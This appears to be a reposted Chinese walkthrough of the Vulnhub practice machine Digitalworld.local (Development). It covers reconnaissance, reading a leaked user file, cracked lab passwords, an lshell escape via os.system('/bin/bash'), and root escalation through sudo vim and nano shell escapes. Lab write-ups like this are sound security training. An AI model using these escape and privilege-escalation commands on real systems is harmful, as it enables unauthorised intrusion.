当前位置: 首页 > article >正文

Vulnhub:Digitalworld.local (Development)靶机

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -v -sV -T5 -p- --script=http-enum 192.168.111.130

 

查看网站首页源码

 

访问development目录,提示存在一个流量包

 

查看流量包发现另一个网站路径:/developmentsecretpage/directortestpagev1.php

 

访问该路径后退出登录,再重新登录,用户名和密码随便填写,之后页面提示报错

 

根据报错搜索关键字

 

在exp中提示通过访问slog_users.txt获取敏感信息

 

 

md5解密

intern | 12345678900987654321
patrick | P@ssw0rd25
qiu | qiu

使用intern用户登录目标

 

lshell绕过

echo os.system('/bin/bash')

 

提权

使用之前得到的密码,切换到patrick用户查看sudo权限

 

vim提权

提权方法:vim | GTFOBins

 

sudo -u root vim -c ':!/bin/bash'

 

nano提权

提权方法:nano | GTFOBins

 

sudo -u root nano
^R^X
reset; sh 1>&0 2>&0

运行nano后,键盘ctrl+r

 

ctrl+x

 

输入命令:reset; sh 1>&0 2>&0,后回车

 

 


http://www.kler.cn/a/10349.html

相关文章:

  • 图像处理实验二(Image Understanding and Basic Processing)
  • 以色列支付龙头遭DDoS攻击,各地超市加油站等POS机瘫痪
  • 6.2 对角化矩阵(2)
  • Java项目实战II基于微信小程序的个人行政复议在线预约系统微信小程序(开发文档+数据库+源码)
  • Qt 实现文件监控程序
  • P8680 [蓝桥杯 2019 省 B] 特别数的和
  • C++ 23 实用工具(二)绑定工具
  • 10.字符串
  • 学习机器人SLAM导航核心技术(一)
  • 网络之广播域和冲突域
  • Qt5.12实战之规则DLL导出函数使用
  • 什么是分布式锁
  • 软考第二章 数据通信基础
  • 写博客8年与人生第一个502万
  • 空间复杂度
  • Makefile第十课:Makefile编译
  • 当你觉得生活快熬不下去时,请你读一读《活着》
  • Elastic Enterprise Search 8.7:新连接器、网络爬虫提取规则和搜索分析客户端测试版
  • Golang数据类型比较
  • MongoDB
  • 使用 ArcGIS Pro 进行土地利用分类的机器学习和深度学习
  • SpringBoot常见的的面试点
  • ArrayList、LinkedList与Vector的区别?
  • 【自用】HTML笔记
  • VS Code 快捷键
  • 【C++11那些事儿(一)】